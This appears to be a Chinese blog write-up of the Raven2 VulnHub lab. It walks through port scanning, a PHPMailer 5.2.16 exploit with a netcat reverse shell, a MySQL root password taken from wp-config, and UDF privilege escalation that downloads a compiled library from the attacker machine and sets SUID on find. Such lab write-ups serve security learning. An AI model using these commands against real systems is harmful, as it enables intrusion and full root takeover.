【vulnhub】Raven2

博客主页:开心星人的博客主页
系列专栏:vulnhub
欢迎关注点赞收藏⭐️留言
首发时间:2022年7月10日
作者水平很有限,如果发现错误,还望告知,感谢!

跟着这篇文章打靶的

主机发现
arp-scan -l
【vulnhub】Raven2_第1张图片
靶机ip为192.168.88.150

端口扫描
nmap -sV -p- 192.168.88.150
【vulnhub】Raven2_第2张图片
访问80端口,未发现敏感信息

扫目录
dirb http://192.168.88.150
【vulnhub】Raven2_第3张图片

vendor目录有敏感信息
【vulnhub】Raven2_第4张图片
访问PATH
【vulnhub】Raven2_第5张图片
访问README.md

【vulnhub】Raven2_第6张图片
phpmailer

这个软件是有漏洞的
查看它的版本号
【vulnhub】Raven2_第7张图片

searchsploit PHPMailer 5.2.16
在这里插入图片描述
locate php/webapps/40974.py
在这里插入图片描述
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /tmp
在这里插入图片描述
使用说明
在这里插入图片描述
文件头加上

#!/usr/bin/python
# -*- coding: utf-8 -*-

【vulnhub】Raven2_第8张图片
【vulnhub】Raven2_第9张图片

python3 40974.py
【vulnhub】Raven2_第10张图片
nc -lvnp 6666

访问http://192.168.88.150/contact.php
再访问http://192.168.88.150/1.php

python -c 'import pty;pty.spawn("/bin/bash")';
【vulnhub】Raven2_第11张图片
【vulnhub】Raven2_第12张图片
发现flag2,还有两个用户

搜索flag
find / -name flag*
【vulnhub】Raven2_第13张图片
【vulnhub】Raven2_第14张图片
进入wordpress目录,看看有什么
【vulnhub】Raven2_第15张图片
查看wp-config.php
【vulnhub】Raven2_第16张图片
mysql -uroot -pR@v3nSecurity
登录mysql
【vulnhub】Raven2_第17张图片
【vulnhub】Raven2_第18张图片
select * from wp_users;
在这里插入图片描述
查看mysql的运行权限
ps -aux|grep mysql
在这里插入图片描述
是root权限,可以用来提权

show global variables like 'secure%';
【vulnhub】Raven2_第19张图片
1)当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
2)当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下,此时也无法提权
3)当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权!

udf提权
searchsploit mysql udf
在这里插入图片描述

在这里插入图片描述
编译运行,生成111.so文件
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o 111.so 1518.o -lc
在这里插入图片描述
现在需要将111.so下载到靶机上

使用python开启一个web服务
python3 -m http.server 80
【vulnhub】Raven2_第20张图片

在shell中wget http://192.168.88.132/111.so
【vulnhub】Raven2_第21张图片

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/111.so'));   //上传到哪就写哪
select * from foo into dumpfile '/usr/lib/mysql/plugin/111.so';   //这个和上一行不是一个路径嗷,要根据前面进程列出来的plugin目录进行改动(一般就是这个)
create function do_system returns integer soname '111.so';     //创建 do_system 函数调用
select do_system('chmod u+s /usr/bin/find');     //给find命令赋予suid权限

退出mysql
find . -exec /bin/sh \;
提权成功

flag4在/root下

你可能感兴趣的:(vulnhub,vulnhub)